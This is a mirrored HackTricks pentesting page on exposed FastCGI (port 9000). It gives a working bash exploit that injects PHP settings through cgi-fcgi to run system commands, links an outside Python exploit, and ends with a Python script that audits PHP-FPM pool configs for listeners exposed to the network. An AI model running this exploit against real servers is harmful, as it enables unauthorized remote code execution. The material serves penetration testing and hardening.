mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
{{#include ../banners/hacktricks-training.md}}
Basic Information
If you want to learn what FastCGI is, check the following page:
{{#ref}} pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md {{#endref}}
By default, FastCGI runs on port 9000 and is not recognized by nmap. Usually, FastCGI only listens on localhost.
RCE
It is fairly easy to make FastCGI execute arbitrary code:

```bash
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done
```

Or you can also use the following Python script: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
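A defensive check for the exposure this page describes, as an added example that is not part of the original page: it flags pools whose `listen` directive binds beyond loopback and notes whether `listen.allowed_clients` restricts callers. It assumes the FastCGI service is PHP-FPM configured through ini-style pool files; the pool names and sample configuration are constructed.

```python
import ipaddress
import re

# Constructed sample pool file (assumption: PHP-FPM ini-style pool syntax).
SAMPLE_POOLS = """\
[www]
listen = 127.0.0.1:9000
[api]
; a bare port binds every interface
listen = 9000
[legacy]
listen = 0.0.0.0:9000
listen.allowed_clients = 127.0.0.1
"""

def classify_listen(value):
    """Classify a PHP-FPM listen value as 'unix', 'loopback' or 'network'."""
    value = value.strip()
    if value.startswith("/"):
        return "unix"
    if value.isdigit():  # port only: listens on all addresses
        return "network"
    host = value.rsplit(":", 1)[0].strip("[]")
    try:
        return "loopback" if ipaddress.ip_address(host).is_loopback else "network"
    except ValueError:
        return "network"  # hostname or unparsable value: report it for review

def audit_pools(text):
    """Return (pool, listen, finding) for every pool bound beyond loopback."""
    pools, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            current = pools.setdefault(section.group(1), {})
        elif current is not None and "=" in line:
            key, _, val = line.partition("=")
            current[key.strip()] = val.strip()
    findings = []
    for name, cfg in pools.items():
        if "listen" not in cfg or classify_listen(cfg["listen"]) != "network":
            continue
        acl = cfg.get("listen.allowed_clients", "")
        finding = f"restricted to {acl}" if acl else "open to any client"
        findings.append((name, cfg["listen"], finding))
    return findings

if __name__ == "__main__":
    print(audit_pools(SAMPLE_POOLS))
```

A pool reported as "open to any client" is the case to fix first: bind it to loopback or a Unix socket, or set `listen.allowed_clients` to the web server's address.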